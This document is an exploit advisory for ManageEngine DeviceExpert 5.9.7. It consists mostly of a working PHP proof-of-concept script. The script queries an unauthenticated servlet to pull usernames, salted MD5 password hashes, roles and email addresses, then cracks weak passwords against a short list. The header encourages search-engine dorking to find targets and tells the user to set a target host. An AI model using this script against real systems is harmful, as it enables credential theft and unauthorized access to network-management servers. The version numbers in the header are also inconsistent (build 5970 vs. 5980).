ManageEngine DeviceExpert 5.9.7 Build 5970 Hash Disclosure

`====================================================================================================================================  
| # Title : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |  
| # Vendor : https://manageengine.com/ |  
====================================================================================================================================  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.  
  
[+] LIne 87 set your targer .  
  
[+] usage : C:\www\test>php 3.php  
  
[+] Payload :  
  
<?php  
class ManageEngineDeviceExpert {  
private $host;  
private $port;  
private $ssl;  
  
public function __construct($host, $port = 6060, $ssl = true) {  
$this->host = $host;  
$this->port = $port;  
$this->ssl = $ssl;  
}  
  
private function sendRequest($path) {  
$url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;  
$ch = curl_init($url);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($ch);  
curl_close($ch);  
return $response;  
}  
  
public function getUsers() {  
echo "Reading users from master...\n";  
$response = $this->sendRequest('/ReadUsersFromMasterServlet');  
if (!$response) {  
echo "Connection failed\n";  
return null;  
}  
if (strpos($response, '<discoverydata>') !== false) {  
preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);  
echo "Found " . count($matches[0]) . " users\n";  
return $matches[0];  
} else {  
echo "Could not find any users\n";  
return null;  
}  
}  
  
public function parseUserData($user) {  
if (!$user) return null;  
  
preg_match('/<username>([^<]+)<\/username>/', $user, $username);  
preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);  
preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);  
preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);  
preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);  
  
$hash = base64_decode($encoded_hash[1]);  
$password = null;  
  
$weak_passwords = ['12345', 'admin', 'password', $username[1]];  
foreach ($weak_passwords as $weak_password) {  
if (md5($weak_password . $salt[1]) == bin2hex($hash)) {  
$password = $weak_password;  
break;  
}  
}  
  
return [  
'username' => $username[1],  
'password' => $password,  
'hash' => bin2hex($hash),  
'role' => $role[1],  
'email' => $email[1],  
'salt' => $salt[1]  
];  
}  
  
public function run() {  
$users = $this->getUsers();  
if (!$users) return;  
  
foreach ($users as $user) {  
$user_data = $this->parseUserData($user);  
if (!$user_data) continue;  
  
echo "User: " . $user_data['username'] . "\n";  
echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";  
echo "Hash: " . $user_data['hash'] . "\n";  
echo "Role: " . $user_data['role'] . "\n";  
echo "Email: " . $user_data['email'] . "\n";  
echo "Salt: " . $user_data['salt'] . "\n";  
echo "----------------------------\n";  
}  
}  
}  
  
// استخدام الكلاس  
$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');  
$deviceExpert->run();  
?>  
  
  
  
Greetings to :==================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |  
================================================================  
`